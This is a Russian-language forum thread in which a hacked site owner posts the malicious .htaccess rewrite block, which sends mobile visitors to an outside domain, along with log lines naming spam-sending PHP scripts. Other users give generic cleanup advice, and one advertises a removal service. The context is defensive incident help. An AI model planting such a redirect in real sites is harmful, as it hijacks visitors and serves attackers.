Взломали сайт, нужна помощь

12
DD
На сайте с 13.10.2012
Offline
9
923

Всем день добрый!

У меня на хосте расположено 10 сайтов, 4 из них работают, 3 стоят в закрытом состоянии (ждут своего часа) и еще 3 тестовых с разными cms, которые так же находятся в закрытом состоянии.

Не так давно заметил, что в файле .htaccess абсолютно каждого сайта впихнули левый редирект на какой то даже не работающий мобильный сайт и поменяли права на незапись 444. Заметив это я вычестил все файлы и поменял пасс от админки хоста. Однако, в скором времени все файлы .htaccess вновь наполнились тем же самым редиректом.

Собственно вот этот самый код, который впихнкли во все .htaccess:

RewriteEngine on

RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "wapp|wapr|webc|winw|winw|xda|xda-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "up.browser|up.link|windowssce|iemobile|mini|mmp" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "symbian|midp|wap|phone|pocket|mobile|pda|psp|PPC|Android" [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ http://mobile-content.info/direct.php [L,R=302]

А сегодня от хостера пришло такое письмо про спам:

Все сайты взломаны, используются для рассылки емейл спама, ввиду этого были остановлены.

Пример:

075 X-PHP-Script: сайт.ru/engine/newsFeb.php for 93.64.61.243, 93.64.61.243
085 X-PHP-Script: сайт.ru/engine/getinfo470n.php for 110.162.109.59, 110.162.109.59
081 X-PHP-Script: сайт.ru/engine/getinfopTdL.php for 84.122.226.216, 84.122.226.216
084 X-PHP-Script: сайт.com/b071282e47/index2ruB.php for 95.60.114.158, 95.60.114.158

и так во всех сайтах.

3 из этих сайтов даже никогда не открывались и не проиндексированы.

Из сторонних модулей использую только два и то лишь на некоторых сайтах: "модуль переходы с ПС" и "модуль кто онлайн".

Движок на всех рабочих сайтах ДЛЕ

Собственно главный вопрос темы: Где искать дыру? виноваты дырявые модули? снести их? или же может каким то образом был украден пороль?

Если рассуждать логически то права на файл .htaccess можно было поменять только зная пороль от фтп или админки-хоста, я прав? или нет.

И если даже взломали как либо через сторонний модуль, то как тогда впихнули редирект во все другие сайты? которые даже никогда в жизни не открывались.

И каким образом впихнули это? через админку? фтп? или как еще

075 X-PHP-Script: сайт.ru/engine/newsFeb.php for 93.64.61.243, 93.64.61.243

085 X-PHP-Script: сайт.ru/engine/getinfo470n.php for 110.162.109.59, 110.162.109.59

081 X-PHP-Script: сайт.ru/engine/getinfopTdL.php for 84.122.226.216, 84.122.226.216

084 X-PHP-Script: сайт.com/b071282e47/index2ruB.php for 95.60.114.158, 95.60.114.158

Что бы не тыкать пальцем в небо, прошу помощи, где собака зарыта? какие пороли поменять? или что еще..

Спасибо.

Garin33
На сайте с 31.08.2009
Offline
169
#1
DerectiveDX:

Движок на всех рабочих сайтах ДЛЕ

Наверняка ломаный, вот ошибка раз.

DerectiveDX:

Собственно главный вопрос темы: Где искать дыру? виноваты дырявые модули? снести их? или же может каким то образом был украден пороль?

Если рассуждать логически то права на файл .htaccess можно было поменять только зная пороль от фтп или админки-хоста, я прав? или нет.

И если даже взломали как либо через сторонний модуль, то как тогда впихнули редирект во все другие сайты? которые даже никогда в жизни не открывались.

Виновато может быть что угодно - модули, плагины, украденный пароль.

По изменению прав - не верно. Могли и через шелл изменить права, что скорее всего и было сделано.

DerectiveDX:

И каким образом впихнули это? через админку? фтп? или как еще
Что бы не тыкать пальцем в небо, прошу помощи, где собака зарыта? какие пороли поменять? или что еще..

Пароли менять однозначно, все все. Проверять http://www.revisium.com/ai/, обновлять все до последних версий, следить за изменениями файлов.

Потому что Drupal - это круто.
Gennadi
На сайте с 18.12.2012
Offline
138
#2

вот что пишет Википедия

Безопасность

В журнале «Хакер» за ноябрь 2008 года упомянутый как «популярный отечественный движок» DataLife Engine актуальной тогда версии 6.7 критиковался за небезопасный алгоритм работы с параметрами запросов[16]. По исследованиям Яндекс[17], DLE часто используется на заражённых сайтах.

ks_dp
На сайте с 26.01.2009
Offline
126
#3
DerectiveDX:


И если даже взломали как либо через сторонний модуль, то как тогда впихнули редирект во все другие сайты? которые даже никогда в жизни не открывались.

Наверняка у Вас один пользователь (на хостинге), поэтому зайдя через один сайт, можно нагадить на остальных.

!
11
На сайте с 02.01.2013
Offline
0
#4
Garin33:
Наверняка ломаный, вот ошибка раз.


Виновато может быть что угодно - модули, плагины, украденный пароль.
По изменению прав - не верно. Могли и через шелл изменить права, что скорее всего и было сделано.

Пароли менять однозначно, все все. Проверять http://www.revisium.com/ai/, обновлять все до последних версий, следить за изменениями файлов.

Если бы так легко было через "шелл-мелл" изменить права папок - этого форума бы уже небыло!

тише едешь - дальше будешь
ks_dp
На сайте с 26.01.2009
Offline
126
#5
1ubuntu1:
Если бы так легко было через "шелл-мелл" изменить права папок - этого форума бы уже небыло!

Откуда такие познания?:)

DD
На сайте с 13.10.2012
Offline
9
#6
Проверять http://www.revisium.com/ai/

Если бы я мог, сайты то мне отключили :(

11
На сайте с 02.01.2013
Offline
0
#7
ks_dp:
Откуда такие познания?:)

откуда такая любознательность!?

Garin33
На сайте с 31.08.2009
Offline
169
#8

DerectiveDX а мы тут чем можем помочь? Пишите в саппорт просите, чтобы выключили аккаунт. Затем через htaccess (на всех сайтах!) разрешайте доступ только со своего ip, и работайте.

11
На сайте с 02.01.2013
Offline
0
#9
DerectiveDX:
Если бы я мог, сайты то мне отключили :(

DerectiveDX

1. сделайте бэкап всех файлов и БД

2. ssh доступ на хостинг держите выключенным

3. не слушайте всех подряд

4. что бы дельно посоветовать нужна конфигурация сервера и ваших файлов!

5. как могли отключить Ваши сайты - за что вы тогда платите хостерам?

6. не морочте голову себе и людям.

R
На сайте с 24.01.2008
Offline
180
#10

ТС, проблема может быть комплексной, если сами не справитесь стучите проверим сайты на все виды вирусов + дадим рекомендации!

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий